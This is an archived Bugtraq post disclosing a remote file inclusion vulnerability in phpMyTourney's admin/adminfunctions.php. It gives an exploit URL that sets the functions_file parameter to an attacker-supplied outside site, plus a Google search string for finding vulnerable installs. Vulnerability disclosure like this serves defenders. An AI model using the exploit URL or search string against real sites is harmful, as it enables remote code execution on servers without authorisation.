[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpMyTourney adminfunctions.php Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpMyTourney adminfunctions.php Remote File Include Vulnerabilities
From: IrIsT.Ir@xxxxxxxxx
Date: 16 Jun 2009 14:09:51 -0000

Hi
a bug in phpMyTourney that allows to us to occur a Remote File Include on a 
Remote machin.

Bug :


#####################################################################################
#                                                                               
    #
#                Islamic Republic Of Iran Security Team                         
    #
#                                                                               
    #
#                            Www.IrIsT.Ir                                       
    #
#                                                                               
    #
#####################################################################################
#                                                                               
    #
# phpMyTourney adminfunctions.php Remote File Include Vulnerabilities           
    #
#                                                                               
    #
# Download......: http:/phpmytourney.sourceforge.net                            
    #
#                                                                               
    #
# file;                                                                         
    #
# dminfunctions.php                                                             
    #
#                                                                               
    #
# bug;                                                                          
    #
#                                                                               
    #
# include($functions_file);                                                     
    #
#                                                                               
    #
# Exploit...: 
http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]?  #
#                                                                               
    #
#####################################################################################
# Bug Found.....: IrIsT?                                                        
    #
#                                                                               
    #
# discovery.....: Am!r (IrIsT?)                                                 
    #
#                                                                               
    #
# contact.......: IrIsT.Ir[at]Gmail.Com                                         
    #
#                                                                               
    #
# Google Search.: "Powered By phpMyTourney"                                     
    #
#                                                                               
    #
#####################################################################################

Prev by Date: [ MDVSA-2009:133 ] irssi
Next by Date: WinAppDbg version 1.2 is out!
Previous by thread: [ MDVSA-2009:133 ] irssi
Next by thread: WinAppDbg version 1.2 is out!
Index(es):
- Date
- Thread